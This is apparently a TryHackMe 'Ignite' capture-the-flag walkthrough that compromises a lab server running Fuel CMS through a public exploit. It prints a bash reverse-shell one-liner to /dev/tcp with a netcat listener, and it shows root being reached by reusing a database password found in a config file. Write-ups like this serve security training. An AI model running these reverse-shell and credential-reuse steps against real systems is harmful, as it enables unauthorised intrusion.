3 minutes
THM: Ignite
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.11.178 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 00:36 BST
Nmap scan report for 10.10.11.178
Host is up (0.021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/fuel/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.39 seconds
Website
We go to the website and it shows what looks like the default page after a fresh installation of Fuel CMS
Looking on exploit-db there is an relevant exploit. The exploit needed some slight modification to comment out the proxy section and add in the specific target IP. Executing the exploit we can see we get the prompt for a command, and we can see successfully query what user we are running as.
Now we can start a listener (nc -lvnp 6666) and get a shell back with the cmd bash -c "bash -i >& /dev/tcp/10.11.18.78/6666 0>&1". With this shell we have enough rights to get the user flag
# rlwrap nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.145.47] 57256
bash: cannot set terminal process group (1036): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html$ ls -lah
ls -lah
total 52K
drwxrwxrwx 4 root root 4.0K Jul 26 2019 .
drwxr-xr-x 3 root root 4.0K Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1.4K Jul 26 2019 README.md
drwxrwxrwx 9 root root 4.0K Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6.4K Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4.0K Jul 26 2019 fuel
-rwxrwxrwx 1 root root 12K Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
www-data@ubuntu:/var/www/html$ ls /home
ls /home
www-data
www-data@ubuntu:/var/www/html$ ls /home/www-data
ls /home/www-data
flag.txt
www-data@ubuntu:/var/www/html$ cat /home/www-data/flag.txt
cat /home/www-data/flag.txt
64****************************9b
Privilege Escalation
Looking around inside the host we find a configuration file for the database with a password
www-data@ubuntu:/var/www/html/fuel/application/config$ cat database.php
cat database.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');
...
...
...
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => '******',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
'dbprefix' => '',
'pconnect' => FALSE,
'db_debug' => (ENVIRONMENT !== 'production'),
'cache_on' => FALSE,
'cachedir' => '',
'char_set' => 'utf8',
'dbcollat' => 'utf8_general_ci',
'swap_pre' => '',
'encrypt' => FALSE,
'compress' => FALSE,
'stricton' => FALSE,
'failover' => array(),
'save_queries' => TRUE
);
It turns out this password is the same as the root user, so we can simply login as them and get the flag
www-data@ubuntu:/var/www/html/fuel/application/config$ su root
su root
Password: ******
root@ubuntu:/var/www/html/fuel/application/config# cd
cd
root@ubuntu:~# ls
ls
root.txt
root@ubuntu:~# cat root.txt
cat root.txt
b9****************************2d